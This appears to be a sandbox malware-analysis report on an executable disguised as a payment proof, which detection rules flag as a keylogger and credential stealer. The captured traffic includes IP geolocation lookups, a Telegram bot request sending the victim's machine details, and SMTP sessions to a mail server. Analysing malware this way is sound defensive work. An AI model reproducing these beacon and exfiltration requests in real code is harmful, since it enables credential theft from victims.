2024-11-18 15:32:34 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:34 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 45428 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IV0of%2BBoFsec%2FJmrCc76H34cgWxH4kUyGealzBv7SaI%2F2cfvPTYvhs2x8gUr49gVvhxFiIs6EZJPAwlufnksjtv19Py4N74B7OsMrMZj4%2FGtKx5KFfN%2BSubCf6pkKrmDou4mcsp%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4903949cda7984-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19111&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=150982&cwnd=32&unsent_bytes=0&cid=bc84acb353bcd3fe&ts=168&x=0"
2024-11-18 15:32:34 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49706	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:36 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 15:32:36 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:36 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 45430 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FB8naTHp%2F6VH7HPOYm%2FtqdF05jwo0gjEGLZ9taCFiQS3tOOF971l5uTzu0%2FtFGRfbTgsjYLD1iPZVF42go1lFCa7IlQU9CKts1lke2XG2F%2Fo0nhuMgqyVB8Ca4gNMOGhivzL291n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e49039efa545203-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18997&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152260&cwnd=32&unsent_bytes=0&cid=42d04fe9017c059f&ts=169&x=0"
2024-11-18 15:32:36 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49718	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:37 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 15:32:38 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:38 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 45432 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpWuH1l4bRTvsoYLtVJCCaAcMPrV7MGWvRqjkw2uj1bfmqe6i1%2FgMQXUuA7IFB%2BjdvoG%2BImkt9x846fXT9kQcCJjSzyPk2H9tWF%2FeuZWTfyZVJh6Leqh7CazPMg4FVFA3XJQdvdt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4903a97c7ee751-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19109&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=150645&cwnd=32&unsent_bytes=0&cid=08e8383a984d07c7&ts=169&x=0"
2024-11-18 15:32:38 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49735	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:40 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 15:32:40 UTC	846	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:40 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 45443 Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UXkfQREfN5kBmgJAfklEnvkDOaDF72D2gBmLf8QnWeIpZgQEMwAzAXOd7G4RfckD2z4LMTkrybgsL6EsF%2BS35Va1Xhwg5s0QSh1xiLOzjJjG9CI1PP8PgNXEI4IfTKnU4T2AsVID"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4903bb8a932e25-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1366&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2049539&cwnd=238&unsent_bytes=0&cid=83880e6fd6dff244&ts=155&x=0"
2024-11-18 15:32:40 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49747	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:42 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 15:32:43 UTC	834	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:42 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: MISS Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UuhwPJdhJaHOk2n0oVC7MFufqxXEiBRGC47UybzDL49fP3mqPS2Ds6RJvXu6s7%2Fs6gNTUeBwwg1EYQR8PpgxnWFE80fjcOkVkEniK0S0YcoJolkwvpfWSik8DCmyRR2wl8znoMki"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4903c60a061d74-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19859&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=144518&cwnd=32&unsent_bytes=0&cid=d417edb29a6830d1&ts=522&x=0"
2024-11-18 15:32:43 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49762	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:44 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 15:32:44 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:44 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 45438 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hxl76%2BfirjtAc0ZNtl4k5Y2xLgBXnIGqxVEKlgO9AFV3RDOu3QljiWe%2FcHfGSrTtkie0yYQneavsxU5AXUk1pWhwWzdUCiVUasHkvc%2B1hCBDRYbvatWaEGKGXBQPq5NcAvXtY0Lt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4903d2dfda7b27-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19110&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=150896&cwnd=32&unsent_bytes=0&cid=1a8a78aa3ef2117d&ts=168&x=0"
2024-11-18 15:32:44 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49775	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:46 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 15:32:46 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:46 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 45440 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QSw3PbqrQDFY3izHx%2Buwh6or6jh5keuTGR%2FIcfunym2w%2F1jaWbVHTLFpqCdw2j20o0KFVNSY2zd%2F13HiH9E0LxSIlpVyiKqRHREsWjOb8N7I%2BzGbEabMm3B1U%2FS4KUifj0X99npf"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4903dd7cb1798a-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19010&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152678&cwnd=32&unsent_bytes=0&cid=ba6b31d5e4ec71ca&ts=191&x=0"
2024-11-18 15:32:46 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49780	149.154.167.220	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:47 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2019/11/2024%20/%2005:20:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-18 15:32:47 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 18 Nov 2024 15:32:47 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-18 15:32:47 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 18, 2024 16:32:55.750030994 CET	587	49813	217.144.107.148	192.168.2.7	220-cl51.vatanwp.com ESMTP Exim 4.96 #2 Mon, 18 Nov 2024 19:02:55 +0330 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 18, 2024 16:32:55.750330925 CET	49813	587	192.168.2.7	217.144.107.148	EHLO 648351
Nov 18, 2024 16:32:56.081542969 CET	587	49813	217.144.107.148	192.168.2.7	250-cl51.vatanwp.com Hello 648351 [155.94.241.187] 250-SIZE 157286400 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 18, 2024 16:32:56.081760883 CET	49813	587	192.168.2.7	217.144.107.148	STARTTLS
Nov 18, 2024 16:32:56.426175117 CET	587	49813	217.144.107.148	192.168.2.7	220 TLS go ahead
Nov 18, 2024 16:33:03.483649969 CET	587	49850	217.144.107.148	192.168.2.7	220-cl51.vatanwp.com ESMTP Exim 4.96 #2 Mon, 18 Nov 2024 19:03:03 +0330 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 18, 2024 16:33:03.484186888 CET	49850	587	192.168.2.7	217.144.107.148	EHLO 648351
Nov 18, 2024 16:33:03.805059910 CET	587	49850	217.144.107.148	192.168.2.7	250-cl51.vatanwp.com Hello 648351 [155.94.241.187] 250-SIZE 157286400 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 18, 2024 16:33:03.805366993 CET	49850	587	192.168.2.7	217.144.107.148	STARTTLS
Nov 18, 2024 16:33:04.127310991 CET	587	49850	217.144.107.148	192.168.2.7	220 TLS go ahead
Nov 18, 2024 16:33:22.265938044 CET	587	49941	217.144.107.148	192.168.2.7	220-cl51.vatanwp.com ESMTP Exim 4.96 #2 Mon, 18 Nov 2024 19:03:22 +0330 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 18, 2024 16:33:22.266333103 CET	49941	587	192.168.2.7	217.144.107.148	EHLO 648351
Nov 18, 2024 16:33:22.592123985 CET	587	49941	217.144.107.148	192.168.2.7	250-cl51.vatanwp.com Hello 648351 [155.94.241.187] 250-SIZE 157286400 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 18, 2024 16:33:22.592331886 CET	49941	587	192.168.2.7	217.144.107.148	STARTTLS
Nov 18, 2024 16:33:22.917278051 CET	587	49941	217.144.107.148	192.168.2.7	220 TLS go ahead

Target ID:	1
Start time:	10:32:25
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\z30ProofofPaymentAttached.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\z30ProofofPaymentAttached.exe"
Imagebase:	0xfb0000
File size:	1'073'152 bytes
MD5 hash:	A2C61107B1D0BD03A8133C81B02FE6D8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000001.00000002.1297671648.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:32:26
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\z30ProofofPaymentAttached.exe"
Imagebase:	0xa80000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.3733442866.0000000003019000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3733442866.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.3731165395.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	7%
Total number of Nodes:	2000
Total number of Limit Nodes:	172

Executed Functions

Function 00FDB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c91f9558127c7e93e1c6449626df3bfa444a5db72fe7bb29038601d6d49e60c
Instruction ID: 787e87fc17e3beeb67cdeec995890730f01b41aa06c58ac5c9fa700c5a5a3c46
Opcode Fuzzy Hash: 5c91f9558127c7e93e1c6449626df3bfa444a5db72fe7bb29038601d6d49e60c
Instruction Fuzzy Hash: 6F326A76E02229CBCB24CF14DC816E9B7B6FB46310F4941DAE40AA7B85D7349E81DF52

Function 00FB3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
